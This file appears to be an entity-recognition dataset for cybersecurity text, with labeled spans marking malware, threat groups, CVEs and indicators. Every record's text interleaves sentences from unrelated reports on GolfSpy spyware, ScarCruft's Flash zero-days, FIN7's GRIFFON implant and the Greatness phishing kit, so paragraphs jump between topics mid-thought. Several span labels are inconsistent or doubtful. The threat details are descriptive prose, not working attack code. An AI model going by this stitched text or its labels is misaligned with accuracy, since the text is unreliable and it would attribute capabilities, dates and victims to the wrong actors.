{"text": "Here is a list of information that GolfSpy steals : Device accounts List of applications installed in the device Device \u2019 s current running processes Battery status Bookmarks/Histories of the device \u2019 s default browser Call logs and records Clipboard contents Contacts , including those in VCard format Mobile operator information Files stored on SDcard Device location List of image , audio , and video files stored on the device Storage and memory information Connection information Sensor information SMS messages Pictures GolfSpy also has a function that lets it connect to a remote server to fetch and perform commands Adobe Flash Player exploit . The emails were efficient social-engineering attempts that appealed to a vast number of human emotions ( fear , stress , anger , etc. ) to elicit a response from their victims . Attackers frequently abuse stolen certificates to prevent the malware they 're spreading from being detected by various security protections .", "spans": [{"start": 35, "end": 42, "label": "Malware"}, {"start": 526, "end": 533, "label": "Malware"}, {"start": 624, "end": 650, "label": "Vulnerability"}, {"start": 657, "end": 663, "label": "System"}, {"start": 831, "end": 840, "label": "Organization"}]}
{"text": ", including : searching for , listing , deleting , and renaming files as well as downloading a file into and retrieving a file from the device ; taking screenshots ; installing other application packages ( APK ) ; recording audio and video ; and updating the malware . It is also possible that ScarCruft deployed another zero day exploit , CVE-2016-0147 , which was patched in April . One of the domains used by the attackers in their 2018 campaign of spear phishing contained more than 130 email aliases , leading us to think that more than 130 companies had been targeted by the end of 2018 . In addition to stealing digital certificates , the Winnti gang 's campaign appears to be motivated by the desire to manipulate in - game currency , such as \" runes \" or \" gold , \" that can in many cases be converted into real currency .", "spans": [{"start": 294, "end": 303, "label": "Organization"}, {"start": 321, "end": 337, "label": "Vulnerability"}, {"start": 340, "end": 353, "label": "Vulnerability"}, {"start": 491, "end": 496, "label": "System"}, {"start": 642, "end": 669, "label": "Organization"}]}
{"text": "Technical Analysis The repackaged applications are embedded with malicious code , which can be found in the com.golf package . Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . We have seen two types of documents sent to victims in these spear phishing campaigns . The attackers may also want to use source code stolen from the game companies so it can be deployed in rogue servers offering pirated versions of the games .", "spans": [{"start": 108, "end": 116, "label": "Indicator"}, {"start": 162, "end": 182, "label": "Vulnerability"}, {"start": 185, "end": 198, "label": "Vulnerability"}, {"start": 336, "end": 345, "label": "Organization"}]}
{"text": "These repackaged apps pose as communication , news , lifestyle , book , and reference apps popularly used in the Middle East . ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . The first one exploits the INCLUDEPICTURE feature of Microsoft Word to get context information about the victim\u2019s computer , and the availability and version number of Microsoft Word . Kaspersky has more here .", "spans": [{"start": 127, "end": 136, "label": "Organization"}, {"start": 175, "end": 195, "label": "Vulnerability"}, {"start": 198, "end": 211, "label": "Vulnerability"}, {"start": 284, "end": 298, "label": "System"}, {"start": 310, "end": 319, "label": "Organization"}, {"start": 320, "end": 324, "label": "System"}, {"start": 425, "end": 434, "label": "Organization"}, {"start": 435, "end": 439, "label": "System"}, {"start": 442, "end": 451, "label": "Organization"}]}
{"text": "The GolfSpy malware embedded in the apps is hardcoded with an internal name used by the attacker . Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets . The second one , which in many cases is an Office document protected with a trivial password , such as \u201c 12345 \u201d , \u201c 1234 \u201d , etc. , uses macros to execute a GRIFFON implant on the target\u2019s computer . Whether known as commodity malware or \u201c as - a - service , \u201d threat actors have long been turning to their fellow adversaries in the hopes of selling off their tools and opening a new stream of revenue .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 148, "end": 157, "label": "Organization"}, {"start": 191, "end": 208, "label": "Vulnerability"}, {"start": 289, "end": 295, "label": "System"}, {"start": 384, "end": 390, "label": "System"}, {"start": 404, "end": 411, "label": "Malware"}, {"start": 464, "end": 481, "label": "Malware"}, {"start": 508, "end": 521, "label": "Organization"}]}
{"text": "Figure 2 . After publishing our initial series of blogposts back in 2016 , Kaspersky have continued to track the ScarCruft threat actor . In various cases , the associated macro also scheduled tasks to make GRIFFON persistent . The software is centrally hosted on that third - party company \u2019s servers .", "spans": [{"start": 75, "end": 84, "label": "Organization"}, {"start": 113, "end": 122, "label": "Organization"}, {"start": 172, "end": 177, "label": "System"}, {"start": 207, "end": 214, "label": "Malware"}, {"start": 269, "end": 301, "label": "System"}]}
{"text": "Icons of the apps that Bouncing Golf \u2019 s operators repackaged ( top ) and a comparison of packages between the original legitimate app ( bottom left ) and GolfSpy ( bottom right ) Figure 3 . After publishing our initial series of blogposts back in 2016 , we have continued to track the ScarCruft threat actor . Interestingly , following some open-source publications about them , the FIN7 operators seems to have developed a homemade builder of malicious Office document using ideas from ThreadKit , which they employed during the summer of 2018 . Think of cloud storage solutions like Dropbox or Plex , for example .", "spans": [{"start": 23, "end": 36, "label": "Malware"}, {"start": 155, "end": 162, "label": "Malware"}, {"start": 384, "end": 388, "label": "Organization"}, {"start": 455, "end": 461, "label": "System"}, {"start": 488, "end": 497, "label": "Malware"}, {"start": 586, "end": 593, "label": "System"}, {"start": 597, "end": 601, "label": "System"}]}
{"text": "GolfSpy \u2019 s configurations encoded by a custom algorithm ( right ) and its decoded version ( left ) As shown in Figure 3 , GolfSpy \u2019 s configurations ( e.g. , C & C server , secret keys ) are encoded by a customized algorithm . ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula . The new builder inserts random values in the Author and Company metadata fields . Threat actors have been using this business model for a decade - plus , originally known as commodity malware .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 123, "end": 130, "label": "Malware"}, {"start": 228, "end": 237, "label": "Organization"}, {"start": 470, "end": 483, "label": "Organization"}, {"start": 562, "end": 579, "label": "Malware"}]}
{"text": "After it is launched , GolfSpy will generate a unique ID for the affected device and then collect its data such as SMS , contact list , location , and accounts in this format : \u201c % , [ ] , time \u201d ( shown in Figure 4 ) . The ScarCruft group uses common malware delivery techniques such as spear phishing and Strategic Web Compromises ( SWC ) . Moreover , the builder allows these to modify different IOCs , such as the filenames of wscript.exe or sctasks.exe copies , etc . This is when threat actors create a suite of malware tools and offer them up for sale on illicit websites .", "spans": [{"start": 23, "end": 30, "label": "Malware"}, {"start": 224, "end": 239, "label": "Organization"}, {"start": 335, "end": 338, "label": "System"}, {"start": 399, "end": 403, "label": "System"}, {"start": 431, "end": 442, "label": "Indicator"}, {"start": 446, "end": 457, "label": "Indicator"}, {"start": 486, "end": 499, "label": "Organization"}, {"start": 507, "end": 531, "label": "System"}]}
{"text": "The information is written into a file on the device . ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula . The GRIFFON implant is a lightweight JScript validator-style implant without any persistence mechanism . It can range from asking \u201c customers \u201d to pay a monthly fee for access to this set of tools to use in cyber attacks , or users can even pay the original creators to distribute the malware on their behalf and manage the infection .", "spans": [{"start": 55, "end": 64, "label": "Organization"}, {"start": 219, "end": 226, "label": "Malware"}, {"start": 252, "end": 259, "label": "System"}, {"start": 422, "end": 435, "label": "Organization"}]}
{"text": "The attacker can choose the data types to collect , which are written in a certain format . ScarCruft uses a multi-stage binary infection scheme . The malware is designed for receiving modules to be executed in-memory and sending the results to C2s . Recently , this model for threat actors has come to be known as the \u201c as - a - service \" model , borrowing the term from the growing trend in the tech industry .", "spans": [{"start": 92, "end": 101, "label": "Organization"}, {"start": 277, "end": 290, "label": "Organization"}]}
{"text": "Figure 4 . One of the most notable functions of the initial dropper is to bypass Windows UAC ( User Account Control ) in order to execute the next payload with higher privileges . We were able to obtain four different modules during the investigation . Ransomware - as - a - service is a relatively new version of these commodity groups , such as DarkSide , known for the cyber attack in 2021 that disrupted the Colonial oil pipeline and made gas more expensive for thousands of U.S. consumers .", "spans": [{"start": 60, "end": 67, "label": "System"}, {"start": 74, "end": 92, "label": "Malware"}, {"start": 253, "end": 282, "label": "Organization"}, {"start": 347, "end": 355, "label": "Organization"}]}
{"text": "Code snippet showing GolfSpy generating UUID The value of % is in the range of 1-9 or a-j . This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams . The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation . But other bad actors have since adopted this businesses model , offering every from command and control servers to phishing bots - as - a - service .", "spans": [{"start": 21, "end": 28, "label": "Malware"}, {"start": 155, "end": 168, "label": "Vulnerability"}, {"start": 172, "end": 177, "label": "System"}, {"start": 262, "end": 269, "label": "Malware"}, {"start": 331, "end": 338, "label": "System"}, {"start": 439, "end": 449, "label": "Organization"}, {"start": 513, "end": 540, "label": "System"}, {"start": 544, "end": 576, "label": "Organization"}]}
{"text": "Each value represents a different type of data to steal from the device : Value Data Type 1 Accounts 2 Installed APP list 3 Running processes list 4 Battery status 5 Browser bookmarks and histories 6 Call logs 7 Clipboard 8 Contacts 9 Mobile operator information a File list on SD card b Location c Image list d Audio list e Video list f Storage and memory information g Connection information h Sensors information i SMS messages j VCard format contacts Table 1 . Afterwards , the installer malware creates a downloader and a configuration file from its resource and executes it . This module mainly relies on WMI and Windows objects to deliver results , which will be sent back to the operators . There are a few reasons why attackers may opt to pay for an as - a - service malware tool for their chosen campaign : \u2022 As - a - service saves attackers time .", "spans": [{"start": 500, "end": 520, "label": "Malware"}, {"start": 527, "end": 545, "label": "Malware"}, {"start": 611, "end": 614, "label": "System"}, {"start": 619, "end": 626, "label": "System"}, {"start": 727, "end": 736, "label": "Organization"}, {"start": 756, "end": 788, "label": "System"}, {"start": 806, "end": 814, "label": "Organization"}]}
{"text": "The type of data corresponding to the value coded in GolfSpy Figure 5 shows the code snippets that are involved in monitoring and recording the device \u2019 s phone call . The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload . Interestingly , more than 20 artifacts are retrieved from the system by this implant during the reconnaissance stage , from the date and time of operating system installation and membership in a Windows domain to a list of and the resolutions of the workstation\u2019s monitors . When they pay for someone else \u2019s malware kit , whether it be ransomware or a phishing bot , they do n\u2019t have to invest time , money or labor to write their own malicious code or tools and instead can hop right into deploying the malware .", "spans": [{"start": 53, "end": 60, "label": "Malware"}, {"start": 172, "end": 190, "label": "System"}, {"start": 191, "end": 218, "label": "Malware"}, {"start": 223, "end": 248, "label": "Malware"}, {"start": 472, "end": 479, "label": "System"}]}
{"text": "It will also take a photo using the device \u2019 s front camera when the user wakes the device . The ScarCruft group keeps expanding its exfiltration targets to steal further information from infected hosts and continues to create tools for additional data exfiltration . The second module is used by the operators to execute an obfuscated PowerShell script , which contains a Meterpreter downloader widely known as \u201c Tinymet \u201c . For the actors and groups who originally created the malware , it is a more reliable income stream for them .", "spans": [{"start": 97, "end": 106, "label": "Organization"}, {"start": 336, "end": 346, "label": "System"}, {"start": 373, "end": 384, "label": "System"}, {"start": 385, "end": 395, "label": "System"}, {"start": 414, "end": 421, "label": "System"}, {"start": 434, "end": 440, "label": "Organization"}]}
{"text": "Apart from collecting the above data , the spyware monitors users \u2019 phone calls , records them , and saves the recorded file on the device . We also discovered an interesting piece of rare malware created by this threat actor \u2013 a Bluetooth device harvester . This downloader , seen in past FIN7 campaigns , downloads a one-byte XOR encrypted ( eg. with the key equal to 0x50 or 0x51 ) piece of meterpreter shellcode to execute . Usually , they \u2019d have to hope a successful attack leads to a ransom payment or some sort of other financial windfall .", "spans": [{"start": 189, "end": 196, "label": "System"}, {"start": 230, "end": 256, "label": "Malware"}, {"start": 264, "end": 274, "label": "System"}, {"start": 290, "end": 294, "label": "Organization"}, {"start": 394, "end": 405, "label": "System"}]}
{"text": "GolfSpy encrypts all the stolen data using a simple XOR operation with a pre-configured key before sending it to the C & C server using the HTTP POST method . We believe they may have some links to North Korea , which may explain why ScarCruft decided to closely monitor them . The third module allows the operators to take a screenshot of the remote system . Instead , they can make money by marketing their services to other bad actors for a fee .", "spans": [{"start": 0, "end": 7, "label": "Malware"}]}
{"text": "Figure 5 . ScarCruft also attacked a diplomatic agency in Hong Kong , and another diplomatic agency in North Korea . To do that , it also drops a PowerShell script on the workstation to execute . \u2022 Bad actors who want to get into the cyber attack business need little to no technical skills to get started .", "spans": [{"start": 37, "end": 54, "label": "Organization"}, {"start": 82, "end": 99, "label": "Organization"}, {"start": 146, "end": 156, "label": "System"}, {"start": 198, "end": 208, "label": "Organization"}]}
{"text": "Code snippets showing how GolfSpy monitors phone calls via register receiver ( top left ) , its actions when the device is woken up ( top right ) , and how it encrypts the stolen data ( bottom ) The malware retrieves commands from the C & C server via HTTP , and attackers can steal specific files on the infected device . It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes . The script executes an open-source .NET class used for taking a screenshot . When an attacker pays for an as - a - service malware , they often get an individual login with dedicated customer support , much like any user would with a legitimate piece of software .", "spans": [{"start": 26, "end": 33, "label": "Malware"}, {"start": 334, "end": 343, "label": "Organization"}, {"start": 367, "end": 379, "label": "Organization"}, {"start": 384, "end": 393, "label": "Organization"}, {"start": 398, "end": 408, "label": "Organization"}, {"start": 455, "end": 459, "label": "Indicator"}, {"start": 505, "end": 513, "label": "Organization"}, {"start": 526, "end": 550, "label": "Malware"}]}
{"text": "The command is a constructed string split into three parts using \" \" as a separator . ScarCruft infected this victim on September 21 , 2018 . The resulting screenshot is saved at \u201c %TMP%/image.png \u201d , sent back to the attackers by the GRIFFON implant and then deleted . As Nick Biasini explained in a past episode of Talos Takes , name recognition also plays a major part in the rising popularity of this business model .", "spans": [{"start": 86, "end": 95, "label": "Organization"}, {"start": 181, "end": 196, "label": "Indicator"}, {"start": 235, "end": 242, "label": "Malware"}, {"start": 273, "end": 285, "label": "Organization"}, {"start": 317, "end": 328, "label": "Organization"}]}
{"text": "The first part is the target directory , the second is a regular expression used to match specific files , while the last part is an ID . But before the ScarCruft infection , however , another APT group also targeted this victim with the host being infected with GreezeBackdoor on March 26 , 2018 . The last retrieved module is a persistence module . Lesser - known threat actors want to piggyback off having a big name associated with them , like DarkSide , to intimidate their actors or lend more credence to the effectiveness of their threats .", "spans": [{"start": 153, "end": 162, "label": "Organization"}, {"start": 351, "end": 379, "label": "Organization"}, {"start": 448, "end": 456, "label": "Malware"}]}
{"text": "Figure 6 . ScarCruft has a keen interest in North Korean affairs , attacking those in the business sector who may have any connection to North Korea , as well as diplomatic agencies around the globe . If the victim appears valuable to the attackers , a GRIFFON implant installer is pushed to the victim\u2019s workstation . Cisco Talos researchers recently discovered Greatness , one of the most advanced phishing - as - a - service tools ever seen in the wild .", "spans": [{"start": 11, "end": 20, "label": "Organization"}, {"start": 90, "end": 105, "label": "Organization"}, {"start": 162, "end": 181, "label": "Organization"}, {"start": 253, "end": 260, "label": "Malware"}, {"start": 269, "end": 278, "label": "System"}, {"start": 319, "end": 342, "label": "Organization"}, {"start": 363, "end": 372, "label": "System"}, {"start": 400, "end": 433, "label": "Organization"}]}
{"text": "Example of a command that steals specific files from an infected device \u2019 s application ( top ) , and GolfSpy \u2019 s parse-and-perform command ( bottom ) Apart from the HTTP POST method , GolfSpy also creates a socket connection to the remote C & C server in order to receive and perform additional commands . Earlier this month , we caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . This module stores another instance of the GRIFFON implant inside the registry to achieve persistence . Our analysis indicates that attackers may have been using attackers since mid-2022 .", "spans": [{"start": 102, "end": 109, "label": "Malware"}, {"start": 185, "end": 192, "label": "Malware"}, {"start": 346, "end": 381, "label": "Vulnerability"}, {"start": 456, "end": 463, "label": "Malware"}, {"start": 545, "end": 554, "label": "Organization"}]}
{"text": "Stolen data will also be encrypted and sent to the C & C server via the socket connection . ScarCruft is a relatively new APT group ; victims have been observed in several countries , including Russia , Nepal , South Korea , China , India , Kuwait and Romania . Here is a PowerLinks style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon . Greatness offers the ability for users to bypass targets \u2019 multi - factor authentication protections , IP filtering and integration with Telegram bots .", "spans": [{"start": 92, "end": 101, "label": "Organization"}, {"start": 272, "end": 282, "label": "System"}, {"start": 357, "end": 364, "label": "Malware"}, {"start": 394, "end": 403, "label": "System"}]}
{"text": "The encryption key is different from the one used for sending stolen data via HTTP . Currently , the group is engaged in two major operations : Operation Daybreak and Operation Erebus . The new GRIFFON implant is written to the hard drive before each execution , limiting the \u201c file-less \u201d aspect of this method . Greatness incorporates features seen in some of the most advanced PaaS offerings , such as multi - factor authentication ( MFA ) bypass , IP filtering and integration with Telegram bots .", "spans": [{"start": 194, "end": 201, "label": "Malware"}, {"start": 314, "end": 323, "label": "System"}, {"start": 452, "end": 464, "label": "System"}, {"start": 486, "end": 499, "label": "System"}]}
{"text": "Figure 7 . The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes . Through its light weight and modular architecture , the GRIFFON implant is the perfect validator . Greatness , for now , is only focused on Microsoft 365 phishing pages , providing its affiliates with an attachment and link builder that creates highly convincing decoy and login pages .", "spans": [{"start": 88, "end": 101, "label": "Vulnerability"}, {"start": 189, "end": 196, "label": "Malware"}, {"start": 232, "end": 241, "label": "Organization"}, {"start": 273, "end": 301, "label": "Organization"}]}
{"text": "The additional commands that attackers can carry out via a socket connection ( top ) and the key used to encrypt the stolen data ( bottom ) Correlating Bouncing Golf 's Activities We monitored Bouncing Golf \u2019 s C & C-related activities and saw that the campaign has affected more than 660 devices as of this writing . The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes . Even though we have been able to retrieve four different modules , it is possible that the FIN7 operators have more modules in their toolsets for achieving their objectives on the victim\u2019s workstation . It contains features such as having the victim \u2019s email address pre - filled and displaying their appropriate company logo and background image , extracted from the target organization \u2019s real Microsoft 365 login page .", "spans": [{"start": 152, "end": 165, "label": "Malware"}, {"start": 193, "end": 206, "label": "Malware"}, {"start": 386, "end": 399, "label": "Vulnerability"}, {"start": 522, "end": 526, "label": "Organization"}]}
{"text": "The small or limited number is understandable given the nature of this campaign , but we also expect it to increase or even diversify in terms of distribution . We will publish more details about the attack once Adobe patches the vulnerability , which should be on June 16 . Attackers make mistakes , and FIN7 are no exception . This makes Greatness particularly well - suited for phishing business users .", "spans": [{"start": 305, "end": 309, "label": "Organization"}, {"start": 340, "end": 349, "label": "Organization"}, {"start": 381, "end": 404, "label": "Organization"}]}
{"text": "Most of the affected devices were located in the Middle East , and many of the stolen data we saw is military-related ( e.g. , images , documents ) . The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily . The major error made by its operators allowed us to follow the command and control server of the GRIFFON implant last year . Any Greatness affiliates do n\u2019t need a specific set of skills .", "spans": [{"start": 191, "end": 205, "label": "Vulnerability"}, {"start": 411, "end": 418, "label": "Malware"}, {"start": 443, "end": 452, "label": "Organization"}]}
{"text": "Bouncing Golf \u2019 s operators also try to cover their tracks . Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia . In order to trick blue teams and other DFIR analysts , the operators created fake HTTP 302 redirection to various Google services on their C2s servers . All they need to do is deploy and configure the provided phishing kit with an API key .", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 89, "end": 111, "label": "Vulnerability"}, {"start": 307, "end": 311, "label": "System"}, {"start": 350, "end": 354, "label": "Indicator"}, {"start": 382, "end": 388, "label": "Organization"}]}
{"text": "The registrant contact details of the C & C domains used in the campaign , for instance , were masked . Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak . This error allowed us to follow the infrastructure week by week , until an individual pushed on Twitter the heuristic to track their C2 at the end of December 2018 . If used successfully , the attacker can set up a proxy Microsoft 365 authentication system and steal a victim \u2019s authentication credentials or cookies with a \u201c man - in - the - middle \" attack .", "spans": [{"start": 119, "end": 132, "label": "Organization"}, {"start": 198, "end": 206, "label": "Vulnerability"}, {"start": 260, "end": 273, "label": "Organization"}, {"start": 402, "end": 409, "label": "Organization"}, {"start": 439, "end": 441, "label": "System"}, {"start": 495, "end": 507, "label": "Organization"}]}
{"text": "The C & C server IP addresses used also appear to be disparate , as they were located in many European countries like Russia , France , Holland , and Germany . Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April . A few days after the tweet , in January 2019 , the operators changed their landing page in order to prevent this type of tracking against their infrastructure . Greatness is specifically designed to work in a standardized way so that the experience is the same for each customer who buys into the service , potentially allowing anyone with a moderate amount of technical ability to carry out advanced , convincing phishing attacks .", "spans": [{"start": 160, "end": 169, "label": "Organization"}, {"start": 186, "end": 195, "label": "Organization"}, {"start": 225, "end": 233, "label": "Vulnerability"}, {"start": 236, "end": 249, "label": "Vulnerability"}, {"start": 488, "end": 497, "label": "Organization"}, {"start": 719, "end": 757, "label": "Organization"}]}
{"text": "It \u2019 s not a definite correlation , but Bouncing Golf also seems to have a connection with Domestic Kitten due to similarities we found in their code . Attacks start with spear-phishing emails that include a link to a website hosting an exploit kit associated with ScarCruft and used in other attacks . During the investigation related to the GRIFFON infrastructure , we found a strange overlap between the WHOIS record of an old GRIFFON C2 and the website of a fake company . Since as - a - service or commodity malware can include all types of malware , it can be tough to provide specific advice for detection and prevention .", "spans": [{"start": 40, "end": 53, "label": "Malware"}, {"start": 91, "end": 106, "label": "Malware"}, {"start": 265, "end": 274, "label": "Organization"}, {"start": 343, "end": 350, "label": "Malware"}, {"start": 407, "end": 412, "label": "System"}, {"start": 430, "end": 437, "label": "Malware"}, {"start": 438, "end": 440, "label": "System"}, {"start": 503, "end": 520, "label": "Malware"}]}
{"text": "For example , the Android malware that both deploy share the same strings of code for their decoding algorithm . Another set of attacks called Operation Erebus leverages another Flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation . According to the website , that domain supposedly belongs to a legitimate security company \u201c fully owned by the Russian Government \u201d ( sic . ) and having offices in \u201c Moscow , Saint Petersburg and Yekaterinburg \u201d , but the address says the company is located in Trump Tower , in New York . For Greatness specifically , anyone implementing multi - factor authentication should opt for code - based authentication through their MFA app of choice , such as Cisco Duo , rather than the easier - to - break method of a simple \u201c yes \u201d or \u201c no \u201d push notification .", "spans": [{"start": 18, "end": 25, "label": "System"}, {"start": 178, "end": 191, "label": "Vulnerability"}, {"start": 194, "end": 207, "label": "Vulnerability"}, {"start": 386, "end": 404, "label": "Organization"}, {"start": 536, "end": 547, "label": "Organization"}, {"start": 568, "end": 577, "label": "Organization"}, {"start": 728, "end": 737, "label": "System"}]}
{"text": "The data that Domestic Kitten steals follows a similar format with Bouncing Golf \u2019 s , with each type of data having a unique identifying character . Thursday 's Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171 . Given FIN7 \u2019s previous use of false security companies , we decided to look deeper into this one . Adversaries may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 14, "end": 29, "label": "Malware"}, {"start": 67, "end": 80, "label": "Malware"}, {"start": 232, "end": 240, "label": "Vulnerability"}, {"start": 241, "end": 254, "label": "Vulnerability"}, {"start": 263, "end": 267, "label": "Organization"}, {"start": 356, "end": 367, "label": "Organization"}]}
{"text": "It \u2019 s also worth noting that both campaigns repackage apps that are commonly used in their target \u2019 s countries , such as Telegram , Kik , and Plus messaging apps . The ongoing operation likely began as early as January 2017 and has continued through the first quarter of 2019 . As we were looking at the content of the website , it became evident that almost all of the text used was lifted from legitimate security-company websites . Operating systems may have features to hide various artifacts , such as important system files and administrative task execution , to avoid disrupting user work environments and prevent users from changing files or features on the system .", "spans": [{"start": 123, "end": 131, "label": "System"}, {"start": 134, "end": 137, "label": "System"}, {"start": 144, "end": 148, "label": "System"}, {"start": 437, "end": 454, "label": "System"}, {"start": 519, "end": 531, "label": "System"}]}
{"text": "Figure 8 . Cisco Talos assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage , which we reported on in November 2018 . Phrases and sentences were borrowed from at least the following companies/sites : DKSec \u2013 www.dksec.com , OKIOK \u2013 www.okiok.com/services/tailored-solutions , MainNerve \u2013 www.mainnerve.com , Datics \u2013 www.datatics.com/cyber-security , Perspective Risk \u2013 www.perspectiverisk.com , Synack \u2013 https://www.synack.com/company , FireEye \u2013 https://www.fireeye.com/services/penetration-testing.html . Adversaries may abuse these features to hide artifacts such as files , directories , user accounts , or other system activity to evade detection.[1][2][3 ]", "spans": [{"start": 11, "end": 22, "label": "Organization"}, {"start": 282, "end": 287, "label": "Organization"}, {"start": 290, "end": 303, "label": "Indicator"}, {"start": 306, "end": 311, "label": "Organization"}, {"start": 314, "end": 355, "label": "Indicator"}, {"start": 358, "end": 367, "label": "Organization"}, {"start": 370, "end": 387, "label": "Indicator"}, {"start": 390, "end": 396, "label": "Organization"}, {"start": 399, "end": 430, "label": "Indicator"}, {"start": 433, "end": 449, "label": "Organization"}, {"start": 452, "end": 475, "label": "Indicator"}, {"start": 478, "end": 484, "label": "Organization"}, {"start": 487, "end": 517, "label": "Indicator"}, {"start": 520, "end": 527, "label": "Organization"}, {"start": 530, "end": 587, "label": "Indicator"}, {"start": 590, "end": 601, "label": "Organization"}]}
{"text": "Code snippets showing : the decoding algorithm shared by both Bouncing Golf and Domestic Kitten ( top ) , the format of data that Domestic Kitten \u2019 s malware targets to steal ( center ) , and how both Bouncing Golf ( bottom left ) and Domestic Kitten ( bottom right ) use \" \" as a separator in their command strings . We assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage , which we reported on in November 2018 . This company seems to have been used by the FIN7 threat actor to hire new people as translators , developers and pentesters . Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation , such as through the use of virtualization technology.[4 ] Bundlore uses the mktemp utility to make unique file and directory names for payloads , such as TMP_DIR=`mktemp", "spans": [{"start": 62, "end": 75, "label": "Malware"}, {"start": 80, "end": 95, "label": "Malware"}, {"start": 130, "end": 145, "label": "Malware"}, {"start": 201, "end": 214, "label": "Malware"}, {"start": 235, "end": 250, "label": "Malware"}, {"start": 542, "end": 546, "label": "Organization"}, {"start": 624, "end": 635, "label": "Organization"}, {"start": 851, "end": 859, "label": "Malware"}, {"start": 869, "end": 883, "label": "System"}]}
{"text": "As we \u2019 ve seen in last year \u2019 s mobile threat landscape , we expect more cyberespionage campaigns targeting the mobile platform given its ubiquity , employing tried-and-tested techniques to lure unwitting users . The common use of the Enfal Trojan suggests that Shadow Network may be exchanging tools and techniques . During our research , we found various job advertisements associated with the company on freelance and remote-work websites . DarkTortilla has used % HiddenReg%", "spans": [{"start": 236, "end": 248, "label": "System"}, {"start": 445, "end": 457, "label": "Malware"}]}
{"text": "The extent of information that these kinds of threats can steal is also significant , as it lets attackers virtually take over a compromised device . While Silence had previously targeted Russian banks , Group-IB experts also have discovered evidence of the group 's activity in more than 25 countries worldwide . While tracking numerous threat actors on a daily basis during the final days of 2018 and at the beginning of 2019 , we discovered various activity clusters sharing certain TTPs associated with the FIN7 intrusion set . and % HiddenKey% as part of its persistence via the Windows registry.[6 ] OSX / Shlayer has used the mktemp utility to make random and unique filenames for payloads , such as export tmpDir=\"$(mktemp -d /tmp / XXXXXXXXXXXX ) \" or mktemp -t Installer .", "spans": [{"start": 150, "end": 163, "label": "Organization"}, {"start": 196, "end": 201, "label": "Organization"}, {"start": 204, "end": 212, "label": "Organization"}, {"start": 511, "end": 515, "label": "Organization"}, {"start": 606, "end": 619, "label": "System"}, {"start": 707, "end": 753, "label": "Indicator"}]}
{"text": "Users should adopt best practices , while organizations should ensure that they balance the need for mobility and the importance of security . In August 2017 , the National Bank of Ukraine warned state-owned and private banks across the country about a large-scale phishing attack . The link between these threat actors and FIN7 is still weak , but we decided to disclose a few hints regarding these in this blog post . Tarrask is able to create \" hidden \" scheduled tasks by deleting the Security Descriptor ( SD ) registry value.[9 ] WarzoneRAT can masquerade the Process Environment Block on a compromised host to hide it 's attempts to elevate privileges through IFileOperation .", "spans": [{"start": 164, "end": 177, "label": "Organization"}, {"start": 212, "end": 225, "label": "Organization"}, {"start": 324, "end": 328, "label": "Organization"}, {"start": 420, "end": 427, "label": "System"}, {"start": 536, "end": 546, "label": "Malware"}]}
{"text": "End users and enterprises can also benefit from multilayered mobile security solutions such as Trend Micro\u2122 Mobile Security\u2122 . The threat actor used an exploit from the arsenal of the state-sponsored hacker group APT28 . In his history , FIN7 has overlapped several times with Cobalt S-MAL/EmpireMonkey in terms of TTPs . This type of attack technique can not be easily mitigated with preventive controls since it is based on the abuse of system features .", "spans": [{"start": 95, "end": 107, "label": "Organization"}, {"start": 213, "end": 218, "label": "Organization"}, {"start": 238, "end": 242, "label": "Organization"}, {"start": 277, "end": 302, "label": "Malware"}]}
{"text": "Trend Micro\u2122 Mobile Security for Enterprise provides device , compliance and application management , data protection , and configuration provisioning , as well as protects devices from attacks that exploit vulnerabilities , preventing unauthorized access to apps , and detecting and blocking malware and fraudulent websites . The new threat actor group was eventually named Silence . This activity cluster , which Kaspersky Lab has followed for a few years , uses various implants for targeting mainly banks , and developers of banking and money processing software solutions . for third - party application logging , messaging , and/or other artifacts that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 13, "end": 43, "label": "System"}]}
